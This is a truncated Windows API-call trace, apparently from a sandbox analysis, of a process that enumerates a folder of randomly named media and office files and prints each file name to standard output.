WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.273] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.274] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2e450, ftCreationTime.dwHighDateTime=0x1d5e476, ftLastAccessTime.dwLowDateTime=0x776a9c0, ftLastAccessTime.dwHighDateTime=0x1d5e3e9, ftLastWriteTime.dwLowDateTime=0x776a9c0, ftLastWriteTime.dwHighDateTime=0x1d5e3e9, nFileSizeHigh=0x0, nFileSizeLow=0x17daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="8ZRp Yo.mp4", cAlternateFileName="")) returned 1 [0057.274] GetProcessHeap () returned 0x670000 [0057.274] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x46) returned 0x69b9a0 [0057.274] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x1e, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="8ZRp Yo.mp4") returned 11 [0057.274] GetProcessHeap () returned 0x670000 [0057.274] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.274] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.274] GetFileType (hFile=0x80) returned 0x3 [0057.274] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.274] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="8ZRp Yo.mp4", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8ZRp Yo.mp4", lpUsedDefaultChar=0x0) returned 12 [0057.274] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0xb, lpOverlapped=0x0) returned 1 [0057.275] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.275] GetFileType (hFile=0x80) returned 0x3 [0057.275] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.275] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.275] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb086900, ftCreationTime.dwHighDateTime=0x1d5e2bd, ftLastAccessTime.dwLowDateTime=0xee4cc050, ftLastAccessTime.dwHighDateTime=0x1d5d9d0, ftLastWriteTime.dwLowDateTime=0xee4cc050, ftLastWriteTime.dwHighDateTime=0x1d5d9d0, nFileSizeHigh=0x0, nFileSizeLow=0x1676d, dwReserved0=0x0, dwReserved1=0x0, cFileName="buFx.bmp", cAlternateFileName="")) returned 1 [0057.275] GetProcessHeap () returned 0x670000 [0057.275] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x40) returned 0x69b9a0 [0057.275] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x1b, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="buFx.bmp") returned 8 [0057.275] GetProcessHeap () returned 0x670000 [0057.275] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.275] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.275] GetFileType (hFile=0x80) returned 0x3 [0057.275] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="buFx.bmp", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="buFx.bmp", lpUsedDefaultChar=0x0) returned 9 [0057.275] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x8, lpOverlapped=0x0) returned 1 [0057.276] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.276] GetFileType (hFile=0x80) returned 0x3 [0057.276] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.276] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.276] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0057.276] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f137d0, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0x7d8ac310, ftLastAccessTime.dwHighDateTime=0x1d5de55, ftLastWriteTime.dwLowDateTime=0x7d8ac310, ftLastWriteTime.dwHighDateTime=0x1d5de55, nFileSizeHigh=0x0, nFileSizeLow=0xf08c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJg6m_dnHXJPIeQU.pps", cAlternateFileName="")) returned 1 [0057.276] GetProcessHeap () returned 0x670000 [0057.276] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x69b9a0 [0057.276] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x27, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="FJg6m_dnHXJPIeQU.pps") returned 20 [0057.276] GetProcessHeap () returned 0x670000 [0057.276] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.276] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.276] GetFileType (hFile=0x80) returned 0x3 [0057.276] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="FJg6m_dnHXJPIeQU.pps", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FJg6m_dnHXJPIeQU.pps", lpUsedDefaultChar=0x0) returned 21 [0057.276] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x14, lpOverlapped=0x0) returned 1 [0057.277] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.277] GetFileType (hFile=0x80) returned 0x3 [0057.277] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.277] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.277] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.277] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a87d0, ftCreationTime.dwHighDateTime=0x1d5e21c, ftLastAccessTime.dwLowDateTime=0x431e1b90, ftLastAccessTime.dwHighDateTime=0x1d5ded3, ftLastWriteTime.dwLowDateTime=0x431e1b90, ftLastWriteTime.dwHighDateTime=0x1d5ded3, nFileSizeHigh=0x0, nFileSizeLow=0x59e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hjb-m4EYHMa7GTDEF.doc", cAlternateFileName="")) returned 1 [0057.277] GetProcessHeap () returned 0x670000 [0057.277] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x5a) returned 0x69b9a0 [0057.277] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x28, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="Hjb-m4EYHMa7GTDEF.doc") returned 21 [0057.277] GetProcessHeap () returned 0x670000 [0057.278] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.278] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.278] GetFileType (hFile=0x80) returned 0x3 [0057.278] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.278] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Hjb-m4EYHMa7GTDEF.doc", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hjb-m4EYHMa7GTDEF.doc", lpUsedDefaultChar=0x0) returned 22 [0057.278] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x15, lpOverlapped=0x0) returned 1 [0057.278] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.278] GetFileType (hFile=0x80) returned 0x3 [0057.278] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.278] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.278] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.278] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6da07d0, ftCreationTime.dwHighDateTime=0x1d5dd48, ftLastAccessTime.dwLowDateTime=0x8c1eec50, ftLastAccessTime.dwHighDateTime=0x1d5d9c1, ftLastWriteTime.dwLowDateTime=0x8c1eec50, ftLastWriteTime.dwHighDateTime=0x1d5d9c1, nFileSizeHigh=0x0, nFileSizeLow=0x1117c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HMYVWNui_rNMPXSZ.bmp", cAlternateFileName="")) returned 1 [0057.278] GetProcessHeap () returned 0x670000 [0057.278] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x69b9a0 [0057.278] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x27, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="HMYVWNui_rNMPXSZ.bmp") returned 20 [0057.278] GetProcessHeap () returned 0x670000 [0057.278] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.278] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.278] GetFileType (hFile=0x80) returned 0x3 [0057.279] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.279] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="HMYVWNui_rNMPXSZ.bmp", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HMYVWNui_rNMPXSZ.bmp", lpUsedDefaultChar=0x0) returned 21 [0057.279] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x14, lpOverlapped=0x0) returned 1 [0057.279] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.279] GetFileType (hFile=0x80) returned 0x3 [0057.279] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.279] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.279] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.279] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3638d50, ftCreationTime.dwHighDateTime=0x1d5def1, ftLastAccessTime.dwLowDateTime=0x4b1f8180, ftLastAccessTime.dwHighDateTime=0x1d5db45, ftLastWriteTime.dwLowDateTime=0x4b1f8180, ftLastWriteTime.dwHighDateTime=0x1d5db45, nFileSizeHigh=0x0, nFileSizeLow=0x16f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="i0eSQ.mp3", cAlternateFileName="")) returned 1 [0057.279] GetProcessHeap () returned 0x670000 [0057.279] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x42) returned 0x69b9a0 [0057.279] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x1c, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="i0eSQ.mp3") returned 9 [0057.279] GetProcessHeap () returned 0x670000 [0057.279] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.279] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.279] GetFileType (hFile=0x80) returned 0x3 [0057.279] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.279] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i0eSQ.mp3", lpUsedDefaultChar=0x0) returned 10 [0057.279] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x9, lpOverlapped=0x0) returned 1 [0057.280] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.280] GetFileType (hFile=0x80) returned 0x3 [0057.280] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.280] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.280] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ba33410, ftCreationTime.dwHighDateTime=0x1d5e556, ftLastAccessTime.dwLowDateTime=0xab91b470, ftLastAccessTime.dwHighDateTime=0x1d5d933, ftLastWriteTime.dwLowDateTime=0xab91b470, ftLastWriteTime.dwHighDateTime=0x1d5d933, nFileSizeHigh=0x0, nFileSizeLow=0x166aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="isH8zy.flv", cAlternateFileName="")) returned 1 [0057.280] GetProcessHeap () returned 0x670000 [0057.280] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x44) returned 0x69b9a0 [0057.280] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x1d, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="isH8zy.flv") returned 10 [0057.280] GetProcessHeap () returned 0x670000 [0057.280] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.280] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.280] GetFileType (hFile=0x80) returned 0x3 [0057.280] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.280] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isH8zy.flv", lpUsedDefaultChar=0x0) returned 11 [0057.280] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0xa, lpOverlapped=0x0) returned 1 [0057.281] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.281] GetFileType (hFile=0x80) returned 0x3 [0057.281] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.281] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.281] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef77100, ftCreationTime.dwHighDateTime=0x1d5e4cd, ftLastAccessTime.dwLowDateTime=0x178a4ba0, ftLastAccessTime.dwHighDateTime=0x1d5df98, ftLastWriteTime.dwLowDateTime=0x178a4ba0, ftLastWriteTime.dwHighDateTime=0x1d5df98, nFileSizeHigh=0x0, nFileSizeLow=0x9358, dwReserved0=0x0, dwReserved1=0x0, cFileName="KaGXpX_uv.docx", cAlternateFileName="")) returned 1 [0057.281] GetProcessHeap () returned 0x670000 [0057.281] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4c) returned 0x69b9a0 [0057.281] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x21, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="KaGXpX_uv.docx") returned 14 [0057.281] GetProcessHeap () returned 0x670000 [0057.281] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.281] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.281] GetFileType (hFile=0x80) returned 0x3 [0057.281] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KaGXpX_uv.docx", lpUsedDefaultChar=0x0) returned 15 [0057.281] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0xe, lpOverlapped=0x0) returned 1 [0057.281] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.281] GetFileType (hFile=0x80) returned 0x3 [0057.282] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.282] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.282] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd77cec0, ftCreationTime.dwHighDateTime=0x1d5e67b, ftLastAccessTime.dwLowDateTime=0x6ea3b250, ftLastAccessTime.dwHighDateTime=0x1d5d93a, ftLastWriteTime.dwLowDateTime=0x6ea3b250, ftLastWriteTime.dwHighDateTime=0x1d5d93a, nFileSizeHigh=0x0, nFileSizeLow=0xf312, dwReserved0=0x0, dwReserved1=0x0, cFileName="KGvZ520tJ.ods", cAlternateFileName="")) returned 1 [0057.282] GetProcessHeap () returned 0x670000 [0057.282] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4a) returned 0x69b9a0 [0057.282] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x20, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="KGvZ520tJ.ods") returned 13 [0057.282] GetProcessHeap () returned 0x670000 [0057.282] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.282] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.282] GetFileType (hFile=0x80) returned 0x3 [0057.282] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.282] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KGvZ520tJ.ods", lpUsedDefaultChar=0x0) returned 14 [0057.282] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0xd, lpOverlapped=0x0) returned 1 [0057.282] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.282] GetFileType (hFile=0x80) returned 0x3 [0057.282] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.283] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.283] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41820a0, ftCreationTime.dwHighDateTime=0x1d5e395, ftLastAccessTime.dwLowDateTime=0xe221dc0, ftLastAccessTime.dwHighDateTime=0x1d5d9e6, ftLastWriteTime.dwLowDateTime=0xe221dc0, ftLastWriteTime.dwHighDateTime=0x1d5d9e6, nFileSizeHigh=0x0, nFileSizeLow=0x138c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="mcjVmrm7V7AJ6t.odt", cAlternateFileName="")) returned 1 [0057.283] GetProcessHeap () returned 0x670000 [0057.283] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x54) returned 0x69b9a0 [0057.283] _vsnwprintf (in: _Buffer=0x69b9a8, _BufferCount=0x25, _Format="%s", _ArgList=0x2097a0 | out: _Buffer="mcjVmrm7V7AJ6t.odt") returned 18 [0057.283] GetProcessHeap () returned 0x670000 [0057.283] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69b9a0 | out: hHeap=0x670000) returned 1 [0057.283] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.283] GetFileType (hFile=0x80) returned 0x3 [0057.283] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.283] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mcjVmrm7V7AJ6t.odt", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mcjVmrm7V7AJ6t.odt", lpUsedDefaultChar=0x0) returned 19 [0057.283] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x12, lpOverlapped=0x0) returned 1 [0057.284] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.284] GetFileType (hFile=0x80) returned 0x3 [0057.284] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.284] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a416640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.284] WriteFile (in: hFile=0x80, lpBuffer=0x4a416640*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2099ec, lpOverlapped=0x0 | out: lpBuffer=0x4a416640*, lpNumberOfBytesWritten=0x2099ec*=0x2, lpOverlapped=0x0) returned 1 [0057.284] FindNextFileW (in: hFindFile=0x68b958, lpFindFileData=0x68b154 | out: lpFindFileData=0x68b154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc0d4740, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xa4f50400, ftLastAccessTime.dwHighDateTime=0x1d5e4d7, ftLastWriteTime.dwLowDateTime=0xa4f50400, ftLastWriteTime.dwHighDateTime=0x1d5e4d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfZck7HwXf4SziBj", cAlternateFileName="")) returned 1 [0057.284] GetProcessHeap () returned 0x670000 [0057.284] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x50) returned 0x69b9a0 [0057.284] _vsnwprintf (in: 